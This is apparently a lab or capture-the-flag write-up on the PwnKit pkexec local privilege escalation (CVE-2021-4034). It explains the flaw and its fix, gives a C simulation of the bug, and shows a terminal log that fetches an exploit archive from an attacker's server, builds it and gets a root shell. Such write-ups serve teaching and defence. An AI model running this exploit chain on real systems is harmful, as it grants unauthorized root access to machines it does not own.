CVE-2021-4034


LinPEAS flagged the target system as vulnerable to CVE-2021-4034 (PwnKit). The vulnerable program, pkexec, is part of Polkit, which manages process privileges: Polkit lets unprivileged processes communicate with privileged ones, and pkexec lets an authorized user run a command as another user (normally root), much like sudo. pkexec is installed SUID root, which is what makes the bug a local privilege escalation.

The flaw is an out-of-bounds read and write that occurs when pkexec is executed with no arguments at all (argc == 0): its argument parser reads argv[1], which in that case is actually envp[0], and writes a resolved program path back into that slot, re-injecting an attacker-controlled variable into pkexec's own environment. By crafting environment variables (GCONV_PATH and CHARSET), an unprivileged local user can trick pkexec into loading and executing an arbitrary shared object with superuser privileges. The fix landed in polkit 0.120; on systems where it cannot be patched, removing the SUID bit from pkexec removes the escalation path.
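To make that mechanism concrete, here is an added example (not code from this page, from the polkit project, or from the PwnKit exploit author) that models in C the argv/envp layout and the few lines of pkexec's main() that the bug lives in. The names pkexec_vulnerable_main, pkexec_fixed_main, find_program_in_path and run_with_argc0 are hypothetical names for this illustration, and the PATH lookup is simplified to plain string concatenation (real pkexec also requires the resolved file to exist and be executable, which is why the exploit's Makefile copies /bin/true to a file named GCONV_PATH=./pwnkit.so:.). Build with cc -Wall and run it; it never touches the real pkexec.

```c
/* Added example: models the argv/envp aliasing behind CVE-2021-4034.
 * Hypothetical names; no real pkexec is executed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified stand-in for g_find_program_in_path(): returns "<first PATH
 * dir>/<name>". Real pkexec additionally checks that the file exists and is
 * executable. Caller frees the result. */
static char *find_program_in_path(const char *name, const char *path_env)
{
    if (name == NULL || path_env == NULL || strchr(name, '/') != NULL)
        return NULL;
    size_t dirlen = strcspn(path_env, ":");       /* first PATH component */
    char *out = malloc(dirlen + 1 + strlen(name) + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, path_env, dirlen);
    out[dirlen] = '/';
    strcpy(out + dirlen + 1, name);
    return out;
}

/* Look up VAR in an envp-style array; returns its value or NULL. */
static const char *env_lookup(char *const envp[], const char *var)
{
    size_t n = strlen(var);
    for (int i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], var, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    return NULL;
}

/* Model of the vulnerable logic. The option loop leaves n == 1 even when
 * argc == 0, so argv[n] reads past argv's NULL terminator into envp[0], and
 * the resolved path is written back into that same slot. */
static int pkexec_vulnerable_main(int argc, char *argv[], char *const envp[])
{
    int n;
    for (n = 1; n < argc; n++) {
        if (strcmp(argv[n], "--help") == 0)       /* real pkexec handles more options */
            return 0;
        break;                                    /* first non-option is the program */
    }
    const char *path = argv[n];                   /* out-of-bounds read when argc == 0 */
    if (path == NULL)
        return 1;
    if (path[0] != '/') {
        char *s = find_program_in_path(path, env_lookup(envp, "PATH"));
        if (s == NULL)
            return 1;
        argv[n] = s;                              /* out-of-bounds write: clobbers envp[0] */
    }
    return 0;
}

/* Patched behaviour (polkit 0.120): refuse to run without an argv[0]. */
static int pkexec_fixed_main(int argc, char *argv[], char *const envp[])
{
    if (argc < 1)
        return 127;
    return pkexec_vulnerable_main(argc, argv, envp);
}

/* Reproduce the process image created by execve(pkexec, {NULL}, env):
 * argv is {NULL} and envp begins in the very next pointer slot. Copies the
 * post-run envp[0] into envp0_after and returns the model's exit code. */
int run_with_argc0(int use_fixed, char *envp0_after, size_t len)
{
    char *vec[] = {
        NULL,                    /* argv[0] == NULL: argc is 0 */
        "pwnkit.so:.",           /* envp[0], read by pkexec as argv[1] */
        "PATH=GCONV_PATH=.",     /* makes the lookup yield GCONV_PATH=./pwnkit.so:. */
        "CHARSET=PWNKIT",        /* selects the attacker's gconv module later on */
        NULL
    };
    char **argv = vec;
    char **envp = vec + 1;
    const char *orig = envp[0];

    int rc = use_fixed ? pkexec_fixed_main(0, argv, envp)
                       : pkexec_vulnerable_main(0, argv, envp);
    snprintf(envp0_after, len, "%s", envp[0]);
    if (envp[0] != orig)
        free(envp[0]);                            /* allocated by the model's lookup */
    return rc;
}

int main(void)
{
    char buf[128];
    int rc = run_with_argc0(0, buf, sizeof buf);
    printf("vulnerable: rc=%d envp[0]=\"%s\"\n", rc, buf);
    rc = run_with_argc0(1, buf, sizeof buf);
    printf("fixed:      rc=%d envp[0]=\"%s\"\n", rc, buf);
    return 0;
}
```

In the vulnerable run the environment string "pwnkit.so:." becomes "GCONV_PATH=./pwnkit.so:.", so pkexec's own environ now carries a GCONV_PATH that was never passed to it. When pkexec subsequently rejects an unsafe variable (the public exploit supplies an invalid SHELL) and prints the error through g_printerr, glibc's iconv honours CHARSET=PWNKIT, reads ./gconv-modules (the file the Makefile's echo line writes) and dlopen()s pwnkit.so while the process is still root. The fixed model returns 127 and leaves envp[0] untouched.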

Exploit (PwnKit):


I found an exploit online.

Privilege Escalation


mark@node:/dev/shm$ wget http://10.10.14.5:8000/main.zip 
--2023-01-19 23:59:52--  http://10.10.14.5:8000/main.zip
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6457 (6.3K) [application/zip]
Saving to: 'main.zip'
 
main.zip                      100%[================================================>]   6.31K  --.-KB/s    in 0s      
 
2023-01-19 23:59:52 (1023 MB/s) - 'main.zip' saved [6457/6457]
 
mark@node:/dev/shm$ unzip main.zip
Archive:  main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore  
  inflating: CVE-2021-4034-main/LICENSE  
  inflating: CVE-2021-4034-main/Makefile  
  inflating: CVE-2021-4034-main/README.md  
  inflating: CVE-2021-4034-main/cve-2021-4034.c  
  inflating: CVE-2021-4034-main/cve-2021-4034.sh  
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile  
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c  
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c  
  inflating: CVE-2021-4034-main/pwnkit.c  
 
mark@node:/dev/shm$ cd CVE-2021-4034-main/
mark@node:/dev/shm/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
 
mark@node:/dev/shm/CVE-2021-4034-main$ ./cve-2021-4034
#
# whoami
root
# hostname
node
# ifconfig
ens33     Link encap:Ethernet  HWaddr 00:50:56:b9:42:eb  
          inet addr:10.10.10.58  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:42eb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:168074 errors:0 dropped:164 overruns:0 frame:0
          TX packets:47777 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:17170815 (17.1 MB)  TX bytes:35834502 (35.8 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:522848 errors:0 dropped:0 overruns:0 frame:0
          TX packets:522848 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:42871115 (42.8 MB)  TX bytes:42871115 (42.8 MB)

System Level Compromise